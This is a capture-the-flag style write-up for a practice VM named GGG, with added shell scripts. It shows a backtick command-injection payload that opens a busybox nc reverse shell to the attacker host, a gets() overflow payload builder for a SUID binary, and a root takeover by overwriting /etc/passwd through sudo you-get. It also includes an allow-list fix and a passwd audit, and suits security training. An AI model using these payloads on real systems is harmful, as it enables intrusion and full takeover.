Group-member box: GGG

  1. Information gathering
  2. Git leak
  3. Command execution: reverse shell
  4. Stack overflow privilege escalation
  5. Privilege escalation to root

Information gathering

┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 0a:00:27:00:00:11 (Unknown: locally administered)
192.168.31.2 08:00:27:66:64:96 PCS Systemtechnik GmbH
192.168.31.229 08:00:27:26:da:52 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.385 seconds (107.34 hosts/sec). 3 responded

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.229
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-14 03:25 EDT
Nmap scan report for 192.168.31.229
Host is up (0.0019s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:26:DA:52 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds

Git leak

Port 80 serves a management system written in JS, with the username and password hardcoded in the front-end code:

const CORRECT_USERNAME = 'welcome';
const CORRECT_PASSWORD = 'ThisIsMypasword';

After logging in there is a fake file upload and an e-mail address, admin@ggg.dsz. Directory scanning turns up an exposed .git directory, which can be pulled down with GitTools:

┌──(root㉿kali)-[~/Desktop/script/gitTools-v0.0.1/Dumper]
└─# ./gitdumper.sh "http://192.168.31.229/.git/" clone
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########


[*] Destination folder does not exist
[+] Creating clone/.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[-] Downloaded: /refs/wip/index/refs/heads/master
[-] Downloaded: /refs/wip/wtree/refs/heads/master
[+] Downloaded: objects/29/efa9b064a5321e124e46dd1b8b1da23151c093
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/bc/363f583ae4fd3e76c26f0c74d179de9052cea4
[+] Downloaded: objects/e8/279ccefbaad9c6454a9395170f87c9cf085534
[+] Downloaded: objects/32/b8aa6a468f5fd587a8e7d5b1fc64582328c78d
[+] Downloaded: objects/4b/825dc642cb6eb9a060e54bf8d69288fbee4904
[+] Downloaded: objects/2d/ce93ea08ed9059be0a838c6bcf62b7b5c28907
[+] Downloaded: objects/ea/dc848545bf75cbf77c71ba707f5498a470af93
[+] Downloaded: objects/90/15a7a32ca0681be64471d3ac2f8c1f24c1040d
[+] Downloaded: objects/87/3d342b871aa76d8d9cddf9716126c14e51ce80

git log on the dumped repository reveals another host name in the author e-mail, gggbaby.ggg.dsz:

┌──(root㉿kali)-[~/…/script/gitTools-v0.0.1/Dumper/clone]
└─# git log
commit 29efa9b064a5321e124e46dd1b8b1da23151c093 (HEAD -> master)
Author: root <root@gggbaby.ggg.dsz>
Date: Fri Jun 13 20:45:56 2025 -0400

rm index.html

Add both ggg.dsz and gggbaby.ggg.dsz to /etc/hosts (pointing at 192.168.31.229). gggbaby.ggg.dsz serves another management system.

Command execution: reverse shell

Logging in with the leaked password exposes an extra network diagnostic tool. A familiar setup: appending a semicolon and the usual command separators does nothing, so there must be a filter behind it. This input, however, works:

127.0.0.1;`busybox nc 192.168.31.129 4444 -e /bin/bash`

That pops a shell. From the shell, look at the source of network-test.php:

<?php
header('Content-Type: text/plain');

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $data = json_decode(file_get_contents('php://input'), true);
    $host = $data['host'] ?? '';

    if (!empty($host)) {
        $filtered = filter_dangerous_chars($host);

        if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
            $command = "ping -n 4 \"$filtered\"";
        } else {
            $command = "ping -c 4 \"$filtered\"";
        }

        $output = shell_exec($command);

        if ($output === null) {
            echo "Error while executing command";
        } else {
            echo $output;
        }
    } else {
        echo "Host address must not be empty";
    }
} else {
    echo "Invalid request method";
}

// Filter function: removes all dangerous characters, but deliberately keeps the backtick
function filter_dangerous_chars($input) {
    $dangerous = array(
        ';', '&', '|', '$', '<', '>', '{', '}',
        '[', ']', '(', ')', '#', '%', '!', '\\',
        '\'', '"', chr(0), chr(10), chr(13)
    );
    return str_replace($dangerous, '', $input);
}
?>

Every character in that list is replaced with nothing, but the backtick is not in the list. The command is built by string concatenation and run through shell_exec, which hands the whole string to /bin/sh. Inside double quotes the shell still performs command substitution, so it first runs whatever sits between the backticks, then splices that command's output into the argument and runs ping with it. Note that the semicolon in the payload above is stripped as well; it is the backticks that do the work, and since $ is also filtered, the $(...) form is not available.

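To make the mechanism visible offline, here is an added example (not code from the writeup or from the GGG box): the same deny-list as filter_dangerous_chars() re-implemented in sh, the shell_exec() step reproduced with sh -c, and a hardened variant that allow-lists the input instead. echo stands in for ping -c 4 so that the argument ping would have received is printed; everything else is the logic of network-test.php.

```sh
#!/bin/sh
# Added example: reproduce network-test.php's filter and its shell_exec() call.

# Delete exactly the characters the PHP removes:
#   ; & | $ < > { } [ ] ( ) # % ! \ ' " NUL LF CR
# The backtick is deliberately absent, as in the original.
filter_dangerous_chars() {
    printf '%s' "$1" | tr -d ';&|$<>{}[]()#%!\\'"'"'"\000\012\015'
}

# Vulnerable form: concatenate the filtered value into a double-quoted
# argument and hand the string to a shell, which is what shell_exec() does.
# `echo` replaces `ping -c 4` so the example runs without network access.
run_diagnostic() {
    filtered=$(filter_dangerous_chars "$1")
    sh -c "echo \"$filtered\""
}

# Hardened form: allow-list the shape of a host name or IPv4 address instead
# of deny-listing shell metacharacters, then single-quote the argument.
run_diagnostic_safe() {
    case "$1" in
        ''|*[!A-Za-z0-9.-]*)
            echo "invalid host" >&2
            return 1
            ;;
    esac
    # Nothing that passed the allow-list can close a single quote.
    sh -c "echo '$1'"
}

# Demonstration, as it would be typed on the attacker box.
run_diagnostic '127.0.0.1;id'              # ';' is stripped: prints 127.0.0.1id
run_diagnostic '127.0.0.1`id -u`'          # backticks survive: id -u runs first
run_diagnostic_safe '127.0.0.1`id -u`' || echo "rejected before any shell saw it"
run_diagnostic_safe 'gggbaby.ggg.dsz'      # prints gggbaby.ggg.dsz
```

The second call shows the substitution order: the inner shell runs id -u before echo (or ping) ever starts, and its output becomes part of the argument. The fix is not a longer deny-list; it is validating the host against an allow-list and, for anything that must reach a shell, escapeshellarg() on the PHP side.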

Stack overflow privilege escalation

/opt holds a SUID-root executable together with its source code:

www-data@GGG:/opt$ ls -al
ls -al
total 32
drwxr-xr-x 2 root root 4096 Jun 13 22:04 .
drwxr-xr-x 18 root root 4096 Mar 18 20:37 ..
-rw-r--r-- 1 root root 552 Jun 13 22:04 demo.c
-rwsr-sr-x 1 root root 16792 Jun 13 22:04 shell_launcher
www-data@GGG:/opt$ cat demo.c
cat demo.c
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void execute_shell() {
system("busybox nc -lp 1234 -e /bin/bash");
}
int main(int argc, char *argv[]) {
setuid(1000);
setgid(1000);
char name[60];
int execute = 0;
printf("Enter your name: ");
fflush(stdout);
gets(name);
printf("Hello, %s!\n", name);
if (execute == 0xABCD1234) {
printf("Launching shell...\n");
execute_shell();
} else {
printf("flag is 0x%X\n", execute);
}
return 0;
}

gets() has no length limit, so anything past the 60 bytes of name lands on the neighbouring int. Feed 60 bytes of junk followed by \x34\x12\xCD\xAB (0xABCD1234 in little-endian byte order) and execute becomes 0xABCD1234. The program is its own oracle: on the non-matching path it prints "flag is 0x..." with the current value of execute, so 60 junk bytes followed by BBBB should print flag is 0x42424242 if the offset is right. Once the check passes, the program runs busybox nc listening on port 1234 with /bin/bash attached; connect to it with nc:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nc 192.168.31.229 1234
id
uid=1000(anjv) gid=33(www-data) groups=33(www-data)
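Building the input for /opt/shell_launcher, as an added example (not from the writeup). It assumes the layout visible in demo.c above, name[60] immediately below execute with no padding, which the writeup's result confirms for this binary but which is a compiler decision rather than a guarantee; the probe function exists precisely to check that before relying on it. The target address is the one from the writeup.

```sh
#!/bin/sh
# Added example: craft and verify the 64-byte input for /opt/shell_launcher.

# Print N copies of a character without bash-only brace expansion.
repeat_char() {
    i=0
    while [ "$i" -lt "$2" ]; do
        printf '%s' "$1"
        i=$((i + 1))
    done
}

# 60 bytes of filler for name[], then 0xABCD1234 as the bytes 34 12 cd ab.
# Octal escapes are used because dash's printf (Debian's /bin/sh) has no \x.
# No byte may be 0x0a, since gets() stops reading at a newline.
build_payload() {
    repeat_char 'A' 60
    printf '\064\022\315\253'
}

# Same layout with BBBB in place of the magic value. If the offset is right
# the binary answers "flag is 0x42424242"; run this before the real payload.
build_probe() {
    repeat_char 'A' 60
    printf 'BBBB'
}

# Hex dump of a generator's output, to eyeball the bytes before sending them.
hexdump_payload() {
    "$1" | od -An -tx1 -v | tr -d ' \n'
}

# On the target, as www-data:
#   build_probe   | /opt/shell_launcher     # expect: flag is 0x42424242
#   build_payload | /opt/shell_launcher     # expect: Launching shell...
# Then from the attacker box:
#   nc 192.168.31.229 1234
hexdump_payload build_payload
echo
```

The listener that appears is spawned by system() inside the SUID process, so the shell you get over port 1234 inherits whatever privileges the binary kept at that point.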

The uid is anjv's but the gid is still www-data's: demo.c calls setuid(1000) before setgid(1000), and once root has been dropped the setgid call no longer has the privilege to succeed, so the process keeps its original real gid 33. Write an SSH public key into ~anjv/.ssh/authorized_keys and log in over SSH for a proper shell.

Privilege escalation to root

anjv@GGG:~$ sudo -l
Matching Defaults entries for anjv on GGG:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User anjv may run the following commands on GGG:
(ALL) NOPASSWD: /usr/local/bin/you-get

You-Get is a Python downloader for audio and video from many sites. Run as root with NOPASSWD, it writes wherever -O points, which makes it an arbitrary file write as root. Prepare a copy of the target's /etc/passwd with one extra line: a second uid-0 account whose password field holds a hash instead of x (the $1$ prefix below is MD5-crypt, the kind openssl passwd -1 produces). Because the field is not x, the login check uses that hash directly and never consults /etc/shadow. Serve the file over HTTP from the attacker box:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
anjv:x:1000:1000:,,,:/home/anjv:/bin/bash
ll:$1$Zg12rJZk$P7IV1RqAT005RKjprDSo41:0:0:root:/root:/bin/bash
┌──(root㉿kali)-[~/Desktop/tmp]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
anjv@GGG:~$ sudo  /usr/local/bin/you-get 192.168.31.129/passwd -O /etc/passwd
you-get: Skipping /etc/passwd: file already exists
Site: 168.31.129
Title: passwd
Type: Unknown type (None)
Size: 0.0 MiB (1451 Bytes)


anjv@GGG:~$ sudo /usr/local/bin/you-get 192.168.31.129/passwd -O /etc/passwd -f
Site: 168.31.129
Title: passwd
Type: Unknown type (None)
Size: 0.0 MiB (1451 Bytes)

Downloading /etc/passwd ...
0.0% ( 0.0/ 0.0MB) ├────────────────────────────────────────────────────────────────────────────────┤[1/1]
File with this name already exists. Overwrite? (y/N) y
you-get: Overwriting passwd ...
100% ( 0.0/ 0.0MB) ├████████████████████████████████████████████████████████████████████████████████┤[1/1] 1 kB/s
anjv@GGG:~$ su ll
Password:
root@GGG:/home/anjv# id
uid=0(root) gid=0(root) groups=0(root)
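The attacker-side preparation above, plus the check a defender would run afterwards, as an added example (not code from the writeup). The hash is taken as an input; generate one with openssl passwd -6 'password' (or -1 for the $1$ form used in the writeup). The three-line passwd file is constructed here to stand in for the copy pulled off the GGG box.

```sh
#!/bin/sh
# Added example: build the replacement passwd file and audit a passwd file
# for the kind of entry this technique leaves behind.

# Append a uid-0 account whose password field carries a hash instead of "x",
# so the login check uses /etc/passwd itself rather than /etc/shadow.
#   $1 copy of the target's /etc/passwd   $2 new user name
#   $3 crypt hash                         $4 output file
add_root_user() {
    cp "$1" "$4"
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$2" "$3" >> "$4"
}

# Defensive check: print every account that is uid 0 or that carries a
# usable hash directly in /etc/passwd. Only "root:x:0:0:..." is expected.
audit_passwd() {
    awk -F: '$3 == 0 || ($2 != "x" && $2 != "*" && $2 != "!" && $2 != "")' "$1"
}

# Constructed sample standing in for the passwd copied from the target.
tmp=$(mktemp -d)
cat > "$tmp/passwd.orig" <<'EOF'
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
anjv:x:1000:1000:,,,:/home/anjv:/bin/bash
EOF

# Hash string as it appears in the writeup's passwd file.
add_root_user "$tmp/passwd.orig" ll '$1$Zg12rJZk$P7IV1RqAT005RKjprDSo41' "$tmp/passwd"
audit_passwd "$tmp/passwd"

# Delivery, as in the writeup: from $tmp run `python3 -m http.server 80`,
# then on the target
#   sudo /usr/local/bin/you-get http://192.168.31.129/passwd -O /etc/passwd -f
# (-f is needed because /etc/passwd already exists) and finally `su ll`.
```

The audit function is the cheap detection for this class of change: a second uid-0 entry, or any entry whose second field is not x, is worth an alert on a system that uses shadow passwords.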